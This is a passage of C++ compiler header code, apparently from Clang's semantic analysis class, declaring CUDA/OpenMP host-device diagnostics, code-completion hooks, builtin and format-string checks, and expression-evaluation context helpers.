/// the device, creates a diagnostic which is emitted if and when we realize
/// that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in CUDA device code.
/// if (CUDADiagIfDeviceCode(Loc, diag::err_cuda_vla) << CurrentCUDATarget())
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder CUDADiagIfDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as host code".
///
/// Same as CUDADiagIfDeviceCode, with "host" and "device" switched.
DeviceDiagBuilder CUDADiagIfHostCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as device code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the device, emits the diagnostics immediately.
/// - If CurContext is a non-`declare target` function and we are compiling
/// for the device, creates a diagnostic which is emitted if and when we
/// realize that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPDeviceCode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as host code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the host, emits the diagnostics immediately.
/// - If CurContext is a non-host function, just ignore it.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPHostCode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPHostCode(SourceLocation Loc, unsigned DiagID);
DeviceDiagBuilder targetDiag(SourceLocation Loc, unsigned DiagID);
enum CUDAFunctionTarget {
CFT_Device,
CFT_Global,
CFT_Host,
CFT_HostDevice,
CFT_InvalidTarget
};
/// Determines whether the given function is a CUDA device/host/kernel/etc.
/// function.
///
/// Use this rather than examining the function's attributes yourself -- you
/// will get it wrong. Returns CFT_Host if D is null.
CUDAFunctionTarget IdentifyCUDATarget(const FunctionDecl *D,
bool IgnoreImplicitHDAttr = false);
CUDAFunctionTarget IdentifyCUDATarget(const ParsedAttributesView &Attrs);
/// Gets the CUDA target for the current context.
CUDAFunctionTarget CurrentCUDATarget() {
return IdentifyCUDATarget(dyn_cast<FunctionDecl>(CurContext));
}
// CUDA function call preference. Must be ordered numerically from
// worst to best.
enum CUDAFunctionPreference {
CFP_Never, // Invalid caller/callee combination.
CFP_WrongSide, // Calls from host-device to host or device
// function that do not match current compilation
// mode.
CFP_HostDevice, // Any calls to host/device functions.
CFP_SameSide, // Calls from host-device to host or device
// function matching current compilation mode.
CFP_Native, // host-to-host or device-to-device calls.
};
/// Identifies relative preference of a given Caller/Callee
/// combination, based on their host/device attributes.
/// \param Caller the function which needs the address of \p Callee;
/// nullptr in case of global context.
/// \param Callee target function
///
/// \returns preference value for particular Caller/Callee combination.
CUDAFunctionPreference IdentifyCUDAPreference(const FunctionDecl *Caller,
const FunctionDecl *Callee);
/// Determines whether Caller may invoke Callee, based on their CUDA
/// host/device attributes. Returns false if the call is not allowed.
///
/// Note: Will return true for CFP_WrongSide calls. These may appear in
/// semantically correct CUDA programs, but only if they're never codegen'ed.
bool IsAllowedCUDACall(const FunctionDecl *Caller,
const FunctionDecl *Callee) {
return IdentifyCUDAPreference(Caller, Callee) != CFP_Never;
}
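// Because the CUDAFunctionPreference enumerators are ordered from worst to
// best, relative preference can be compared directly; a hedged sketch (not
// a verbatim call site):
//
//   if (IdentifyCUDAPreference(Caller, A) > IdentifyCUDAPreference(Caller, B))
//     ; // overload A is the better CUDA candidate for this caller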
/// May add implicit CUDAHostAttr and CUDADeviceAttr attributes to FD,
/// depending on FD and the current compilation settings.
void maybeAddCUDAHostDeviceAttrs(FunctionDecl *FD,
const LookupResult &Previous);
public:
/// Check whether we're allowed to call Callee from the current context.
///
/// - If the call is never allowed in a semantically-correct program
/// (CFP_Never), emits an error and returns false.
///
/// - If the call is allowed in semantically-correct programs, but only if
/// it's never codegen'ed (CFP_WrongSide), creates a deferred diagnostic to
/// be emitted if and when the caller is codegen'ed, and returns true.
///
/// Will only create deferred diagnostics for a given SourceLocation once,
/// so you can safely call this multiple times without generating duplicate
/// deferred errors.
///
/// - Otherwise, returns true without emitting any diagnostics.
bool CheckCUDACall(SourceLocation Loc, FunctionDecl *Callee);
/// Set __device__ or __host__ __device__ attributes on the given lambda
/// operator() method.
///
/// CUDA lambdas declared inside __device__ or __global__ functions inherit
/// the __device__ attribute. Similarly, lambdas inside __host__ __device__
/// functions become __host__ __device__ themselves.
void CUDASetLambdaAttrs(CXXMethodDecl *Method);
/// Finds the function in \p Matches with the highest calling priority
/// from the \p Caller context and erases all functions with a lower
/// calling priority.
void EraseUnwantedCUDAMatches(
const FunctionDecl *Caller,
SmallVectorImpl<std::pair<DeclAccessPair, FunctionDecl *>> &Matches);
/// Given an implicit special member, infer its CUDA target from the
/// calls it needs to make to underlying base/field special members.
/// \param ClassDecl the class for which the member is being created.
/// \param CSM the kind of special member.
/// \param MemberDecl the special member itself.
/// \param ConstRHS true if this is a copy operation with a const object on
/// its RHS.
/// \param Diagnose true if this call should emit diagnostics.
/// \return true if there was an error inferring.
/// The result of this call is implicit CUDA target attribute(s) attached to
/// the member declaration.
bool inferCUDATargetForImplicitSpecialMember(CXXRecordDecl *ClassDecl,
CXXSpecialMember CSM,
CXXMethodDecl *MemberDecl,
bool ConstRHS,
bool Diagnose);
/// \return true if \p CD can be considered empty according to CUDA
/// (E.2.3.1 in CUDA 7.5 Programming guide).
bool isEmptyCudaConstructor(SourceLocation Loc, CXXConstructorDecl *CD);
bool isEmptyCudaDestructor(SourceLocation Loc, CXXDestructorDecl *CD);
// \brief Checks that initializers of \p Var satisfy CUDA restrictions. In
// case of error emits appropriate diagnostic and invalidates \p Var.
//
// \details CUDA allows only empty constructors as initializers for global
// variables (see E.2.3.1, CUDA 7.5). The same restriction also applies to all
// __shared__ variables whether they are local or not (they all are implicitly
// static in CUDA). One exception is that CUDA allows constant initializers
// for __constant__ and __device__ variables.
void checkAllowedCUDAInitializer(VarDecl *VD);
/// Check whether NewFD is a valid overload for CUDA. Emits
/// diagnostics and invalidates NewFD if not.
void checkCUDATargetOverload(FunctionDecl *NewFD,
const LookupResult &Previous);
/// Copies target attributes from the template TD to the function FD.
void inheritCUDATargetAttrs(FunctionDecl *FD, const FunctionTemplateDecl &TD);
/// Returns the name of the launch configuration function. This is the name
/// of the function that will be called to configure the kernel call, with
/// the parameters specified via <<<>>>.
std::string getCudaConfigureFuncName() const;
/// \name Code completion
//@{
/// Describes the context in which code completion occurs.
enum ParserCompletionContext {
/// Code completion occurs at top-level or namespace context.
PCC_Namespace,
/// Code completion occurs within a class, struct, or union.
PCC_Class,
/// Code completion occurs within an Objective-C interface, protocol,
/// or category.
PCC_ObjCInterface,
/// Code completion occurs within an Objective-C implementation or
/// category implementation
PCC_ObjCImplementation,
/// Code completion occurs within the list of instance variables
/// in an Objective-C interface, protocol, category, or implementation.
PCC_ObjCInstanceVariableList,
/// Code completion occurs following one or more template
/// headers.
PCC_Template,
/// Code completion occurs following one or more template
/// headers within a class.
PCC_MemberTemplate,
/// Code completion occurs within an expression.
PCC_Expression,
/// Code completion occurs within a statement, which may
/// also be an expression or a declaration.
PCC_Statement,
/// Code completion occurs at the beginning of the
/// initialization statement (or expression) in a for loop.
PCC_ForInit,
/// Code completion occurs within the condition of an if,
/// while, switch, or for statement.
PCC_Condition,
/// Code completion occurs within the body of a function on a
/// recovery path, where we do not have a specific handle on our position
/// in the grammar.
PCC_RecoveryInFunction,
/// Code completion occurs where only a type is permitted.
PCC_Type,
/// Code completion occurs in a parenthesized expression, which
/// might also be a type cast.
PCC_ParenthesizedExpression,
/// Code completion occurs within a sequence of declaration
/// specifiers within a function, method, or block.
PCC_LocalDeclarationSpecifiers
};
void CodeCompleteModuleImport(SourceLocation ImportLoc, ModuleIdPath Path);
void CodeCompleteOrdinaryName(Scope *S,
ParserCompletionContext CompletionContext);
void CodeCompleteDeclSpec(Scope *S, DeclSpec &DS,
bool AllowNonIdentifiers,
bool AllowNestedNameSpecifiers);
struct CodeCompleteExpressionData;
void CodeCompleteExpression(Scope *S,
const CodeCompleteExpressionData &Data);
void CodeCompleteExpression(Scope *S, QualType PreferredType,
bool IsParenthesized = false);
void CodeCompleteMemberReferenceExpr(Scope *S, Expr *Base, Expr *OtherOpBase,
SourceLocation OpLoc, bool IsArrow,
bool IsBaseExprStatement,
QualType PreferredType);
void CodeCompletePostfixExpression(Scope *S, ExprResult LHS,
QualType PreferredType);
void CodeCompleteTag(Scope *S, unsigned TagSpec);
void CodeCompleteTypeQualifiers(DeclSpec &DS);
void CodeCompleteFunctionQualifiers(DeclSpec &DS, Declarator &D,
const VirtSpecifiers *VS = nullptr);
void CodeCompleteBracketDeclarator(Scope *S);
void CodeCompleteCase(Scope *S);
/// Reports signatures for a call to CodeCompleteConsumer and returns the
/// preferred type for the current argument. Returned type can be null.
QualType ProduceCallSignatureHelp(Scope *S, Expr *Fn, ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceConstructorSignatureHelp(Scope *S, QualType Type,
SourceLocation Loc,
ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceCtorInitMemberSignatureHelp(Scope *S, Decl *ConstructorDecl,
CXXScopeSpec SS,
ParsedType TemplateTypeTy,
ArrayRef<Expr *> ArgExprs,
IdentifierInfo *II,
SourceLocation OpenParLoc);
void CodeCompleteInitializer(Scope *S, Decl *D);
void CodeCompleteAfterIf(Scope *S);
void CodeCompleteQualifiedId(Scope *S, CXXScopeSpec &SS, bool EnteringContext,
bool IsUsingDeclaration, QualType BaseType,
QualType PreferredType);
void CodeCompleteUsing(Scope *S);
void CodeCompleteUsingDirective(Scope *S);
void CodeCompleteNamespaceDecl(Scope *S);
void CodeCompleteNamespaceAliasDecl(Scope *S);
void CodeCompleteOperatorName(Scope *S);
void CodeCompleteConstructorInitializer(
Decl *Constructor,
ArrayRef<CXXCtorInitializer *> Initializers);
void CodeCompleteLambdaIntroducer(Scope *S, LambdaIntroducer &Intro,
bool AfterAmpersand);
void CodeCompleteObjCAtDirective(Scope *S);
void CodeCompleteObjCAtVisibility(Scope *S);
void CodeCompleteObjCAtStatement(Scope *S);
void CodeCompleteObjCAtExpression(Scope *S);
void CodeCompleteObjCPropertyFlags(Scope *S, ObjCDeclSpec &ODS);
void CodeCompleteObjCPropertyGetter(Scope *S);
void CodeCompleteObjCPropertySetter(Scope *S);
void CodeCompleteObjCPassingType(Scope *S, ObjCDeclSpec &DS,
bool IsParameter);
void CodeCompleteObjCMessageReceiver(Scope *S);
void CodeCompleteObjCSuperMessage(Scope *S, SourceLocation SuperLoc,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression);
void CodeCompleteObjCClassMessage(Scope *S, ParsedType Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
bool IsSuper = false);
void CodeCompleteObjCInstanceMessage(Scope *S, Expr *Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
ObjCInterfaceDecl *Super = nullptr);
void CodeCompleteObjCForCollection(Scope *S,
DeclGroupPtrTy IterationVar);
void CodeCompleteObjCSelector(Scope *S,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCProtocolReferences(
ArrayRef<IdentifierLocPair> Protocols);
void CodeCompleteObjCProtocolDecl(Scope *S);
void CodeCompleteObjCInterfaceDecl(Scope *S);
void CodeCompleteObjCSuperclass(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationDecl(Scope *S);
void CodeCompleteObjCInterfaceCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCPropertyDefinition(Scope *S);
void CodeCompleteObjCPropertySynthesizeIvar(Scope *S,
IdentifierInfo *PropertyName);
void CodeCompleteObjCMethodDecl(Scope *S, Optional<bool> IsInstanceMethod,
ParsedType ReturnType);
void CodeCompleteObjCMethodDeclSelector(Scope *S,
bool IsInstanceMethod,
bool AtParameterName,
ParsedType ReturnType,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCClassPropertyRefExpr(Scope *S, IdentifierInfo &ClassName,
SourceLocation ClassNameLoc,
bool IsBaseExprStatement);
void CodeCompletePreprocessorDirective(bool InConditional);
void CodeCompleteInPreprocessorConditionalExclusion(Scope *S);
void CodeCompletePreprocessorMacroName(bool IsDefinition);
void CodeCompletePreprocessorExpression();
void CodeCompletePreprocessorMacroArgument(Scope *S,
IdentifierInfo *Macro,
MacroInfo *MacroInfo,
unsigned Argument);
void CodeCompleteIncludedFile(llvm::StringRef Dir, bool IsAngled);
void CodeCompleteNaturalLanguage();
void CodeCompleteAvailabilityPlatformName();
void GatherGlobalCodeCompletions(CodeCompletionAllocator &Allocator,
CodeCompletionTUInfo &CCTUInfo,
SmallVectorImpl<CodeCompletionResult> &Results);
//@}
//===--------------------------------------------------------------------===//
// Extra semantic analysis beyond the C type system
public:
SourceLocation getLocationOfStringLiteralByte(const StringLiteral *SL,
unsigned ByteNo) const;
private:
void CheckArrayAccess(const Expr *BaseExpr, const Expr *IndexExpr,
const ArraySubscriptExpr *ASE=nullptr,
bool AllowOnePastEnd=true, bool IndexNegated=false);
void CheckArrayAccess(const Expr *E);
// Used to grab the relevant information from a FormatAttr and a
// FunctionDeclaration.
struct FormatStringInfo {
unsigned FormatIdx;
unsigned FirstDataArg;
bool HasVAListArg;
};
static bool getFormatStringInfo(const FormatAttr *Format, bool IsCXXMember,
FormatStringInfo *FSI);
bool CheckFunctionCall(FunctionDecl *FDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckObjCMethodCall(ObjCMethodDecl *Method, SourceLocation loc,
ArrayRef<const Expr *> Args);
bool CheckPointerCall(NamedDecl *NDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckOtherCall(CallExpr *TheCall, const FunctionProtoType *Proto);
void CheckConstructorCall(FunctionDecl *FDecl,
ArrayRef<const Expr *> Args,
const FunctionProtoType *Proto,
SourceLocation Loc);
void checkCall(NamedDecl *FDecl, const FunctionProtoType *Proto,
const Expr *ThisArg, ArrayRef<const Expr *> Args,
bool IsMemberFunction, SourceLocation Loc, SourceRange Range,
VariadicCallType CallType);
bool CheckObjCString(Expr *Arg);
ExprResult CheckOSLogFormatStringArg(Expr *Arg);
ExprResult CheckBuiltinFunctionCall(FunctionDecl *FDecl,
unsigned BuiltinID, CallExpr *TheCall);
void checkFortifiedBuiltinMemoryFunction(FunctionDecl *FD, CallExpr *TheCall);
bool CheckARMBuiltinExclusiveCall(unsigned BuiltinID, CallExpr *TheCall,
unsigned MaxWidth);
bool CheckNeonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMVEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckARMBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckAArch64BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckBPFBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinCpu(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinCpu(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckSystemZBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinRoundingOrSAE(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinGatherScatterScale(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckPPCBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStart(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStartARMMicrosoft(CallExpr *Call);
bool SemaBuiltinUnorderedCompare(CallExpr *TheCall);
bool SemaBuiltinFPClassification(CallExpr *TheCall, unsigned NumArgs);
bool SemaBuiltinVSX(CallExpr *TheCall);
bool SemaBuiltinOSLogFormat(CallExpr *TheCall);
public:
// Used by C++ template instantiation.
ExprResult SemaBuiltinShuffleVector(CallExpr *TheCall);
ExprResult SemaConvertVectorExpr(Expr *E, TypeSourceInfo *TInfo,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
private:
bool SemaBuiltinPrefetch(CallExpr *TheCall);
bool SemaBuiltinAllocaWithAlign(CallExpr *TheCall);
bool SemaBuiltinAssume(CallExpr *TheCall);
bool SemaBuiltinAssumeAligned(CallExpr *TheCall);
bool SemaBuiltinLongjmp(CallExpr *TheCall);
bool SemaBuiltinSetjmp(CallExpr *TheCall);
ExprResult SemaBuiltinAtomicOverloaded(ExprResult TheCallResult);
ExprResult SemaBuiltinNontemporalOverloaded(ExprResult TheCallResult);
ExprResult SemaAtomicOpsOverloaded(ExprResult TheCallResult,
AtomicExpr::AtomicOp Op);
ExprResult SemaBuiltinOperatorNewDeleteOverloaded(ExprResult TheCallResult,
bool IsDelete);
bool SemaBuiltinConstantArg(CallExpr *TheCall, int ArgNum,
llvm::APSInt &Result);
bool SemaBuiltinConstantArgRange(CallExpr *TheCall, int ArgNum, int Low,
int High, bool RangeIsError = true);
bool SemaBuiltinConstantArgMultiple(CallExpr *TheCall, int ArgNum,
unsigned Multiple);
bool SemaBuiltinConstantArgPower2(CallExpr *TheCall, int ArgNum);
bool SemaBuiltinConstantArgShiftedByte(CallExpr *TheCall, int ArgNum);
bool SemaBuiltinConstantArgShiftedByteOrXXFF(CallExpr *TheCall, int ArgNum);
bool SemaBuiltinARMSpecialReg(unsigned BuiltinID, CallExpr *TheCall,
int ArgNum, unsigned ExpectedFieldNum,
bool AllowName);
bool SemaBuiltinARMMemoryTaggingCall(unsigned BuiltinID, CallExpr *TheCall);
public:
enum FormatStringType {
FST_Scanf,
FST_Printf,
FST_NSString,
FST_Strftime,
FST_Strfmon,
FST_Kprintf,
FST_FreeBSDKPrintf,
FST_OSTrace,
FST_OSLog,
FST_Unknown
};
static FormatStringType GetFormatStringType(const FormatAttr *Format);
bool FormatStringHasSArg(const StringLiteral *FExpr);
static bool GetFormatNSStringIdx(const FormatAttr *Format, unsigned &Idx);
private:
bool CheckFormatArguments(const FormatAttr *Format,
ArrayRef<const Expr *> Args,
bool IsCXXMember,
VariadicCallType CallType,
SourceLocation Loc, SourceRange Range,
llvm::SmallBitVector &CheckedVarArgs);
bool CheckFormatArguments(ArrayRef<const Expr *> Args,
bool HasVAListArg, unsigned format_idx,
unsigned firstDataArg, FormatStringType Type,
VariadicCallType CallType,
SourceLocation Loc, SourceRange range,
llvm::SmallBitVector &CheckedVarArgs);
void CheckAbsoluteValueFunction(const CallExpr *Call,
const FunctionDecl *FDecl);
void CheckMaxUnsignedZero(const CallExpr *Call, const FunctionDecl *FDecl);
void CheckMemaccessArguments(const CallExpr *Call,
unsigned BId,
IdentifierInfo *FnName);
void CheckStrlcpycatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckStrncatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckReturnValExpr(Expr *RetValExp, QualType lhsType,
SourceLocation ReturnLoc,
bool isObjCMethod = false,
const AttrVec *Attrs = nullptr,
const FunctionDecl *FD = nullptr);
public:
void CheckFloatComparison(SourceLocation Loc, Expr *LHS, Expr *RHS);
private:
void CheckImplicitConversions(Expr *E, SourceLocation CC = SourceLocation());
void CheckBoolLikeConversion(Expr *E, SourceLocation CC);
void CheckForIntOverflow(Expr *E);
void CheckUnsequencedOperations(const Expr *E);
/// Perform semantic checks on a completed expression. This will either
/// be a full-expression or a default argument expression.
void CheckCompletedExpr(Expr *E, SourceLocation CheckLoc = SourceLocation(),
bool IsConstexpr = false);
void CheckBitFieldInitialization(SourceLocation InitLoc, FieldDecl *Field,
Expr *Init);
/// Check if there is a field shadowing.
void CheckShadowInheritedFields(const SourceLocation &Loc,
DeclarationName FieldName,
const CXXRecordDecl *RD,
bool DeclIsField = true);
/// Check if the given expression contains 'break' or 'continue'
/// statement that produces control flow different from GCC.
void CheckBreakContinueBinding(Expr *E);
/// Check whether the receiver is a mutable ObjC container which
/// attempts to add itself into the container.
void CheckObjCCircularContainer(ObjCMessageExpr *Message);
void AnalyzeDeleteExprMismatch(const CXXDeleteExpr *DE);
void AnalyzeDeleteExprMismatch(FieldDecl *Field, SourceLocation DeleteLoc,
bool DeleteWasArrayForm);
public:
/// Register a magic integral constant to be used as a type tag.
void RegisterTypeTagForDatatype(const IdentifierInfo *ArgumentKind,
uint64_t MagicValue, QualType Type,
bool LayoutCompatible, bool MustBeNull);
struct TypeTagData {
TypeTagData() {}
TypeTagData(QualType Type, bool LayoutCompatible, bool MustBeNull) :
Type(Type), LayoutCompatible(LayoutCompatible),
MustBeNull(MustBeNull)
{}
QualType Type;
/// If true, \c Type should be compared with other expression's types for
/// layout-compatibility.
unsigned LayoutCompatible : 1;
unsigned MustBeNull : 1;
};
/// A pair of ArgumentKind identifier and magic value. This uniquely
/// identifies the magic value.
typedef std::pair<const IdentifierInfo *, uint64_t> TypeTagMagicValue;
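// Illustrative (non-verbatim) form of the attributes this machinery
// services; `my_api`, `my_send` and the indices are placeholders:
//
//   static const int my_tag
//       __attribute__((type_tag_for_datatype(my_api, int))) = 42;
//   void my_send(void *buf, int tag)
//       __attribute__((argument_with_type_tag(my_api, 1, 2)));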
private:
/// A map from magic value to type information.
std::unique_ptr<llvm::DenseMap<TypeTagMagicValue, TypeTagData>>
TypeTagForDatatypeMagicValues;
/// Perform checks on a call of a function with argument_with_type_tag
/// or pointer_with_type_tag attributes.
void CheckArgumentWithTypeTag(const ArgumentWithTypeTagAttr *Attr,
const ArrayRef<const Expr *> ExprArgs,
SourceLocation CallSiteLoc);
/// Check if we are taking the address of a packed field, as this may be
/// a problem if the pointer value is dereferenced.
void CheckAddressOfPackedMember(Expr *rhs);
/// The parser's current scope.
///
/// The parser maintains this state here.
Scope *CurScope;
mutable IdentifierInfo *Ident_super;
mutable IdentifierInfo *Ident___float128;
/// Nullability type specifiers.
IdentifierInfo *Ident__Nonnull = nullptr;
IdentifierInfo *Ident__Nullable = nullptr;
IdentifierInfo *Ident__Null_unspecified = nullptr;
IdentifierInfo *Ident_NSError = nullptr;
/// The handler for the FileChanged preprocessor events.
///
/// Used for diagnostics that implement custom semantic analysis for #include
/// directives, like -Wpragma-pack.
sema::SemaPPCallbacks *SemaPPCallbackHandler;
protected:
friend class Parser;
friend class InitializationSequence;
friend class ASTReader;
friend class ASTDeclReader;
friend class ASTWriter;
public:
/// Retrieve the keyword associated with the given nullability kind.
IdentifierInfo *getNullabilityKeyword(NullabilityKind nullability);
/// The struct behind the CFErrorRef pointer.
RecordDecl *CFError = nullptr;
bool isCFError(RecordDecl *D);
/// Retrieve the identifier "NSError".
IdentifierInfo *getNSErrorIdent();
/// Retrieve the parser's current scope.
///
/// This routine must only be used when it is certain that semantic analysis
/// and the parser are in precisely the same context, which is not the case
/// when, e.g., we are performing any kind of template instantiation.
/// Therefore, the only safe places to use this scope are in the parser
/// itself and in routines directly invoked from the parser and *never* from
/// template substitution or instantiation.
Scope *getCurScope() const { return CurScope; }
void incrementMSManglingNumber() const {
return CurScope->incrementMSManglingNumber();
}
IdentifierInfo *getSuperIdentifier() const;
IdentifierInfo *getFloat128Identifier() const;
Decl *getObjCDeclContext() const;
DeclContext *getCurLexicalContext() const {
return OriginalLexicalContext ? OriginalLexicalContext : CurContext;
}
const DeclContext *getCurObjCLexicalContext() const {
const DeclContext *DC = getCurLexicalContext();
// A category implicitly has the attribute of the interface.
if (const ObjCCategoryDecl *CatD = dyn_cast<ObjCCategoryDecl>(DC))
DC = CatD->getClassInterface();
return DC;
}
/// To be used for checking whether the number of arguments being passed
/// to a function exceeds the number of parameters it expects.
static bool TooManyArguments(size_t NumParams, size_t NumArgs,
bool PartialOverloading = false) {
// We check whether we're just after a comma in code-completion.
if (NumArgs > 0 && PartialOverloading)
return NumArgs + 1 > NumParams; // If so, we view as an extra argument.
return NumArgs > NumParams;
}
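// Worked example: with NumParams == 2, NumArgs == 2, and PartialOverloading
// true (the cursor sits just after a comma during code completion), the
// pending argument counts too, so 2 + 1 > 2 and this returns true.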
// Emitting members of dllexported classes is delayed until the class
// (including field initializers) is fully parsed.
SmallVector<CXXRecordDecl*, 4> DelayedDllExportClasses;
SmallVector<CXXMethodDecl*, 4> DelayedDllExportMemberFunctions;
private:
int ParsingClassDepth = 0;
class SavePendingParsedClassStateRAII {
public:
SavePendingParsedClassStateRAII(Sema &S) : S(S) { swapSavedState(); }
~SavePendingParsedClassStateRAII() {
assert(S.DelayedOverridingExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
assert(S.DelayedEquivalentExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
swapSavedState();
}
private:
Sema &S;
decltype(DelayedOverridingExceptionSpecChecks)
SavedOverridingExceptionSpecChecks;
decltype(DelayedEquivalentExceptionSpecChecks)
SavedEquivalentExceptionSpecChecks;
void swapSavedState() {
SavedOverridingExceptionSpecChecks.swap(
S.DelayedOverridingExceptionSpecChecks);
SavedEquivalentExceptionSpecChecks.swap(
S.DelayedEquivalentExceptionSpecChecks);
}
};
/// Helper class that collects misaligned member designations and
/// their location info for delayed diagnostics.
struct MisalignedMember {
Expr *E;
RecordDecl *RD;
ValueDecl *MD;
CharUnits Alignment;
MisalignedMember() : E(), RD(), MD(), Alignment() {}
MisalignedMember(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment)
: E(E), RD(RD), MD(MD), Alignment(Alignment) {}
explicit MisalignedMember(Expr *E)
: MisalignedMember(E, nullptr, nullptr, CharUnits()) {}
bool operator==(const MisalignedMember &m) { return this->E == m.E; }
};
/// Small set of gathered accesses to potentially misaligned members
/// due to the packed attribute.
SmallVector<MisalignedMember, 4> MisalignedMembers;
/// Adds an expression to the set of gathered misaligned members.
void AddPotentialMisalignedMembers(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment);
public:
/// Diagnoses the current set of gathered accesses. This typically
/// happens at full expression level. The set is cleared after emitting the
/// diagnostics.
void DiagnoseMisalignedMembers();
/// This function checks whether the expression is in the set of potentially
/// misaligned members and is being converted to some pointer type T with
/// lower or equal alignment requirements; if so, it removes the expression
/// from the set. This is used when we do not want to diagnose such a
/// misaligned access (e.g. in conversions to void*).
void DiscardMisalignedMemberAddress(const Type *T, Expr *E);
/// This function calls Action when it determines that E designates a
/// misaligned member due to the packed attribute. This is used to emit
/// local diagnostics like in reference binding.
void RefersToMemberWithReducedAlignment(
Expr *E,
llvm::function_ref<void(Expr *, RecordDecl *, FieldDecl *, CharUnits)>
Action);
/// Describes the reason a calling convention specification was ignored, used
/// for diagnostics.
enum class CallingConventionIgnoredReason {
ForThisTarget = 0,
VariadicFunction,
ConstructorDestructor,
BuiltinFunction
};
};
/// RAII object that enters a new expression evaluation context.
class EnterExpressionEvaluationContext {
Sema &Actions;
bool Entered = true;
public:
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Decl *LambdaContextDecl = nullptr,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other,
bool ShouldEnter = true)
: Actions(Actions), Entered(ShouldEnter) {
if (Entered)
Actions.PushExpressionEvaluationContext(NewContext, LambdaContextDecl,
ExprContext);
}
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Sema::ReuseLambdaContextDecl_t,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other)
: Actions(Actions) {
Actions.PushExpressionEvaluationContext(
NewContext, Sema::ReuseLambdaContextDecl, ExprContext);
}
enum InitListTag { InitList };
EnterExpressionEvaluationContext(Sema &Actions, InitListTag,
bool ShouldEnter = true)
: Actions(Actions), Entered(false) {
// In C++11 onwards, narrowing checks are performed on the contents of
// braced-init-lists, even when they occur within unevaluated operands.
// Therefore we still need to instantiate constexpr functions used in such
// a context.
if (ShouldEnter && Actions.isUnevaluatedContext() &&
Actions.getLangOpts().CPlusPlus11) {
Actions.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::UnevaluatedList);
Entered = true;
}
}
~EnterExpressionEvaluationContext() {
if (Entered)
Actions.PopExpressionEvaluationContext();
}
};
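// A minimal usage sketch (assuming a Sema instance `S`; not a verbatim call
// site): the constructor pushes the new context and the destructor pops it.
//
//   {
//     EnterExpressionEvaluationContext Unevaluated(
//         S, Sema::ExpressionEvaluationContext::Unevaluated);
//     // ... build expressions that must not be odr-used ...
//   } // context popped here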
DeductionFailureInfo
MakeDeductionFailureInfo(ASTContext &Context, Sema::TemplateDeductionResult TDK,
sema::TemplateDeductionInfo &Info);
/// Contains a late templated function.
/// Will be parsed at the end of the translation unit, used by Sema & Parser.
struct LateParsedTemplate {
CachedTokens Toks;
